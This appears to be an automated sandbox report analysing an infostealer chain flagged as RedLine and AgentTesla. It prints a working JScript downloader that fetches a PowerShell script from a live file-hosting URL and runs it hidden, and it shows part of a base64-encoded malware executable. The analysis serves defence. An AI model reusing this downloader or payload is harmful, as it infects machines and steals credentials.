                                                                  Imagebase:0x7ff6cb6b0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:11:42:30
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6ee680000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:11:42:33
                                                                  Start date:20/12/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                  Imagebase:0x400000
                                                                  File size:968'158 bytes
                                                                  MD5 hash:915A6F3675442C388110FB11DB36620A
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.1727362900.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 35%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:11:42:33
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                  Imagebase:0xd00000
                                                                  File size:45'984 bytes
                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.2882351625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2887524458.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Call Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  callgraph clusterC0 clusterC2C0 clusterC4C0 clusterC6C0 clusterC8C0 clusterC10C8 clusterC12C8 clusterC14C0 clusterC16C14 clusterC18C14 clusterC20C14 clusterC22C14 clusterC24C14 clusterC30C0 clusterC32C30 clusterC26C0 clusterC28C26 clusterC34C0 clusterC36C34 E1C0 entry:C0 F3C2 CreateObject E1C0->F3C2 F5C4 CreateObject E1C0->F5C4 F7C6 CreateObject E1C0->F7C6 F35C34 Main E1C0->F35C34 F9C8 EnsureTempDirectoryExists F11C10 FolderExists F9C8->F11C10 F13C12 CreateFolder F9C8->F13C12 F15C14 DownloadScript F17C16 Open F15C14->F17C16 F19C18 Send F15C14->F19C18 F21C20 CreateTextFile F15C14->F21C20 F23C22 Write F15C14->F23C22 F25C24 Close F15C14->F25C24 F27C26 LogError F15C14->F27C26 F29C28 Echo F27C26->F29C28 F31C30 RunPowerShellScript F31C30->F27C26 F33C32 Run F31C30->F33C32 F35C34->F9C8 F35C34->F15C14 F35C34->F27C26 F35C34->F31C30 F37C36 Quit F35C34->F37C36

                                                                  Script:

                                                                  Code
                                                                  0
                                                                  var URL = "https://files.catbox.moe/gj7umd.ps1";
                                                                    1
                                                                    var DownloadPath = "C:\\Temp\\dddddd.ps1";
                                                                      2
                                                                      var TEMP_DIR = "C:\\Temp";
                                                                        3
                                                                        var SUCCESS_STATUS = 200;
                                                                          4
                                                                          var POWERSHELL_CMD = "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ";
                                                                            5
                                                                            var shell = WScript.CreateObject ( "WScript.Shell" );
                                                                            • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                            6
                                                                            var fileSystem = WScript.CreateObject ( "Scripting.FileSystemObject" );
                                                                            • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                                                            7
                                                                            var http = WScript.CreateObject ( "MSXML2.XMLHTTP" );
                                                                            • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                                                            8
                                                                            function EnsureTempDirectoryExists() {
                                                                            • EnsureTempDirectoryExists() ➔ undefined
                                                                            9
                                                                            if ( ! fileSystem.FolderExists ( TEMP_DIR ) )
                                                                            • FolderExists("C:\Temp") ➔ false
                                                                            10
                                                                            {
                                                                              11
                                                                              fileSystem.CreateFolder ( TEMP_DIR );
                                                                              • CreateFolder("C:\Temp") ➔ C:\Temp
                                                                              12
                                                                              }
                                                                                13
                                                                                }
                                                                                  14
                                                                                  function DownloadScript(url, path) {
                                                                                  • DownloadScript("https://files.catbox.moe/gj7umd.ps1","C:\Temp\dddddd.ps1") ➔ true
                                                                                  15
                                                                                  http.Open ( "GET", url, false );
                                                                                  • Open("GET","https://files.catbox.moe/gj7umd.ps1",false) ➔ undefined
                                                                                  16
                                                                                  http.Send ( );
                                                                                  • Send() ➔ undefined
                                                                                  17
                                                                                  if ( http.Status !== SUCCESS_STATUS )
                                                                                    18
                                                                                    {
                                                                                      19
                                                                                      LogError ( "Download failed with status: " + http.Status );
                                                                                        20
                                                                                        return false;
                                                                                          21
                                                                                          }
                                                                                            22
                                                                                            try
                                                                                              23
                                                                                              {
                                                                                                24
                                                                                                var file = fileSystem.CreateTextFile ( path, true );
                                                                                                • CreateTextFile("C:\Temp\dddddd.ps1",true) ➔
                                                                                                25
                                                                                                file.Write ( http.ResponseText );
                                                                                                • Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe") [IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("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") ➔ undefined
                                                                                                26
                                                                                                file.Close ( );
                                                                                                • Close() ➔ undefined
                                                                                                27
                                                                                                return true;
                                                                                                  28
                                                                                                  }
                                                                                                    29
                                                                                                    catch ( e )
                                                                                                      30
                                                                                                      {
                                                                                                        31
                                                                                                        LogError ( "Error writing downloaded script: " + e.message );
                                                                                                          32
                                                                                                          return false;
                                                                                                            33
                                                                                                            }
                                                                                                              34
                                                                                                              }
                                                                                                                35
                                                                                                                function LogError(message) {
                                                                                                                  36
                                                                                                                  WScript.Echo ( message );
                                                                                                                    37
                                                                                                                    }
                                                                                                                      38
                                                                                                                      function RunPowerShellScript(scriptPath) {
                                                                                                                      • RunPowerShellScript("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                      39
                                                                                                                      try
                                                                                                                        40
                                                                                                                        {
                                                                                                                          41
                                                                                                                          var powerShellCommand = POWERSHELL_CMD + "\"" + scriptPath + "\"";
                                                                                                                            42
                                                                                                                            shell.Run ( powerShellCommand, 0, true );
                                                                                                                            • Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"",0,true) ➔ 0
                                                                                                                            43
                                                                                                                            }
                                                                                                                              44
                                                                                                                              catch ( e )
                                                                                                                                45
                                                                                                                                {
                                                                                                                                  46
                                                                                                                                  LogError ( "Failed to execute PowerShell script: " + e.message );
                                                                                                                                    47
                                                                                                                                    }
                                                                                                                                      48
                                                                                                                                      }
                                                                                                                                        49
                                                                                                                                        function Main() {
                                                                                                                                        • Main() ➔ undefined
                                                                                                                                        50
                                                                                                                                        EnsureTempDirectoryExists ( );
                                                                                                                                        • EnsureTempDirectoryExists() ➔ undefined
                                                                                                                                        51
                                                                                                                                        if ( ! DownloadScript ( URL, DownloadPath ) )
                                                                                                                                        • DownloadScript("https://files.catbox.moe/gj7umd.ps1","C:\Temp\dddddd.ps1") ➔ true
                                                                                                                                        52
                                                                                                                                        {
                                                                                                                                          53
                                                                                                                                          LogError ( "Exiting script due to download failure." );
                                                                                                                                            54
                                                                                                                                            WScript.Quit ( );
                                                                                                                                              55
                                                                                                                                              }
                                                                                                                                                56
                                                                                                                                                RunPowerShellScript ( DownloadPath );
                                                                                                                                                • RunPowerShellScript("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                                                57
                                                                                                                                                }
                                                                                                                                                  58
                                                                                                                                                  Main ( );
                                                                                                                                                  • Main() ➔ undefined
                                                                                                                                                  Reset < >

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 00007FFB4AA00000 Relevance: 1.3, Instructions: 1327COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1766367778.00007FFB4AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AA00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffb4aa00000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 324935d6233f2fd89fa5ee25a2996ab888e93a420b90cdc0272b7d79cbba16f4
                                                                                                                                                    • Instruction ID: 1d27b8a7188be4732d31327e26947e94ab8204d6a97ebcba436372d1401b4a8b
                                                                                                                                                    • Opcode Fuzzy Hash: 324935d6233f2fd89fa5ee25a2996ab888e93a420b90cdc0272b7d79cbba16f4
                                                                                                                                                    • Instruction Fuzzy Hash: 138225A290DBC90FF796AF7888656B47FE1EF56214B1901FBD08DC7193D9189C06C3A2
                                                                                                                                                    Function 00007FFB4AA007F7 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1766367778.00007FFB4AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AA00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffb4aa00000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 338a41f86b8cd073ae813839faf84c2e78d6c56110fc6b08a1785cdb2f013b07
                                                                                                                                                    • Instruction ID: dbee96b873081ff398399c814eb31af98ef794ea74d33505fa7ade3d619298bc
                                                                                                                                                    • Opcode Fuzzy Hash: 338a41f86b8cd073ae813839faf84c2e78d6c56110fc6b08a1785cdb2f013b07
                                                                                                                                                    • Instruction Fuzzy Hash: 5E11EBA2E1D9064BF6ACBE28D65617A32C5FF94318B7901F9D80DD2982DE086C0742D2
                                                                                                                                                    Function 00007FFB4A9337B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1765681400.00007FFB4A930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A930000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffb4a930000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                    • Instruction ID: 2b988f6ad23953534eff47a4a6756d9dd70321514fde7af8960183fce11b94c1
                                                                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                    • Instruction Fuzzy Hash: 8A01A77010CB0D4FD744EF0CE091AB6B3E0FB99320F10056EE58AC3652D632E882CB41

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:3.6%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:1.5%
                                                                                                                                                    Signature Coverage:4.8%
                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                    Total number of Limit Nodes:39
                                                                                                                                                    execution_graph 86105 4010e0 86108 401100 86105->86108 86107 4010f8 86109 401113 86108->86109 86111 401120 86109->86111 86112 401184 86109->86112 86113 40114c 86109->86113 86139 401182 86109->86139 86110 40112c DefWindowProcW 86110->86107 86111->86110 86153 401000 Shell_NotifyIconW __cftof2_l 86111->86153 86146 401250 61 API calls __cftof2_l 86112->86146 86115 401151 86113->86115 86116 40119d 86113->86116 86120 401219 86115->86120 86121 40115d 86115->86121 86118 4011a3 86116->86118 86119 42afb4 86116->86119 86117 401193 86117->86107 86118->86111 86126 4011b6 KillTimer 86118->86126 86127 4011db SetTimer RegisterWindowMessageW 86118->86127 86148 40f190 10 API calls 86119->86148 86120->86111 86131 401225 86120->86131 86123 401163 86121->86123 86128 42b01d 86121->86128 86129 42afe9 86123->86129 86130 40116c 86123->86130 86125 42b04f 86154 40e0c0 74 API calls __cftof2_l 86125->86154 86147 401000 Shell_NotifyIconW __cftof2_l 86126->86147 86127->86117 86136 401204 CreatePopupMenu 86127->86136 86128->86110 86152 4370f4 52 API calls 86128->86152 86150 40f190 10 API calls 86129->86150 86130->86111 86138 401174 86130->86138 86155 468b0e 74 API calls __cftof2_l 86131->86155 86136->86107 86149 45fd57 65 API calls __cftof2_l 86138->86149 86139->86110 86140 42afe4 86140->86117 86141 42b00e 86151 401a50 381 API calls 86141->86151 86142 4011c9 PostQuitMessage 86142->86107 86145 42afdc 86145->86110 86145->86140 86146->86117 86147->86142 86148->86117 86149->86145 86150->86141 86151->86139 86152->86139 86153->86125 86154->86139 86155->86140 86156 40bd20 86157 428194 86156->86157 86158 40bd2d 86156->86158 86160 40bd43 86157->86160 86162 4281bc 86157->86162 86165 4281b2 86157->86165 86159 40bd37 86158->86159 86179 4531b1 85 API calls 5 library calls 86158->86179 86168 40bd50 86159->86168 86178 45e987 86 API calls moneypunct 86162->86178 86177 40b510 VariantClear 86165->86177 86167 4281ba 86169 426cf1 86168->86169 86170 40bd63 86168->86170 86189 44cde9 52 API calls _memmove 86169->86189 86180 40bd80 86170->86180 86173 426cfc 86190 40e0a0 86173->86190 86174 40bd73 86174->86160 86176 426d02 86177->86167 86178->86158 86179->86159 86181 40bd8e 86180->86181 86185 40bdb7 _memmove 86180->86185 86182 40bded 86181->86182 86183 40bdad 86181->86183 86181->86185 86200 4115d7 86182->86200 86194 402f00 86183->86194 86185->86174 86188 4115d7 52 API calls 86188->86185 86189->86173 86191 40e0b2 86190->86191 86192 40e0a8 86190->86192 86191->86176 86234 403c30 52 API calls _memmove 86192->86234 86195 402f10 86194->86195 86196 402f0c 86194->86196 86197 4268c3 86195->86197 86198 4115d7 52 API calls 86195->86198 86196->86185 86199 402f51 moneypunct _memmove 86198->86199 86199->86185 86202 4115e1 _malloc 86200->86202 86203 40bdf6 86202->86203 86206 4115fd std::exception::exception 86202->86206 86211 4135bb 86202->86211 86203->86185 86203->86188 86204 41163b 86226 4180af 46 API calls std::exception::operator= 86204->86226 86206->86204 86225 41130a 51 API calls __cinit 86206->86225 86207 411645 86227 418105 RaiseException 86207->86227 86210 411656 86212 413638 _malloc 86211->86212 86220 4135c9 _malloc 86211->86220 86233 417f77 46 API calls __getptd_noexit 86212->86233 86215 4135f7 RtlAllocateHeap 86215->86220 86224 413630 86215->86224 86217 413624 86231 417f77 46 API calls __getptd_noexit 86217->86231 86220->86215 86220->86217 86221 413622 86220->86221 86222 4135d4 86220->86222 86232 417f77 46 API calls __getptd_noexit 86221->86232 86222->86220 86228 418901 46 API calls 2 library calls 86222->86228 86229 418752 46 API calls 8 library calls 86222->86229 86230 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86222->86230 86224->86202 86225->86204 86226->86207 86227->86210 86228->86222 86229->86222 86231->86221 86232->86224 86233->86224 86234->86191 86235 425ba2 86240 40e360 86235->86240 86237 425bb4 86256 41130a 51 API calls __cinit 86237->86256 86239 425bbe 86241 4115d7 52 API calls 86240->86241 86242 40e3ec GetModuleFileNameW 86241->86242 86257 413a0e 86242->86257 86244 40e421 _wcsncat 86260 413a9e 86244->86260 86247 4115d7 52 API calls 86248 40e45e _wcscpy 86247->86248 86263 40bc70 86248->86263 86252 40e4a1 _wcscat _wcslen _wcsncpy 86253 40e4a9 86252->86253 86254 401c90 52 API calls 86252->86254 86255 4115d7 52 API calls 86252->86255 86253->86237 86254->86252 86255->86252 86256->86239 86282 413801 86257->86282 86312 419efd 86260->86312 86264 4115d7 52 API calls 86263->86264 86265 40bc98 86264->86265 86266 4115d7 52 API calls 86265->86266 86267 40bca6 86266->86267 86268 40e4c0 86267->86268 86324 403350 86268->86324 86270 40e4cb RegOpenKeyExW 86271 427190 RegQueryValueExW 86270->86271 86272 40e4eb 86270->86272 86273 4271b0 86271->86273 86274 42721a RegCloseKey 86271->86274 86272->86252 86275 4115d7 52 API calls 86273->86275 86274->86252 86276 4271cb 86275->86276 86331 43652f 52 API calls 86276->86331 86278 4271d8 RegQueryValueExW 86279 42720e 86278->86279 86280 4271f7 86278->86280 86279->86274 86332 402160 86280->86332 86283 41389e 86282->86283 86289 41381a 86282->86289 86284 4139e8 86283->86284 86285 413a00 86283->86285 86309 417f77 46 API calls __getptd_noexit 86284->86309 86311 417f77 46 API calls __getptd_noexit 86285->86311 86288 4139ed 86310 417f25 10 API calls __mbstowcs_l_helper 86288->86310 86289->86283 86297 41388a 86289->86297 86304 419e30 46 API calls __mbstowcs_l_helper 86289->86304 86292 41396c 86292->86283 86293 413967 86292->86293 86295 41397a 86292->86295 86293->86244 86294 413929 86294->86283 86296 413945 86294->86296 86306 419e30 46 API calls __mbstowcs_l_helper 86294->86306 86308 419e30 46 API calls __mbstowcs_l_helper 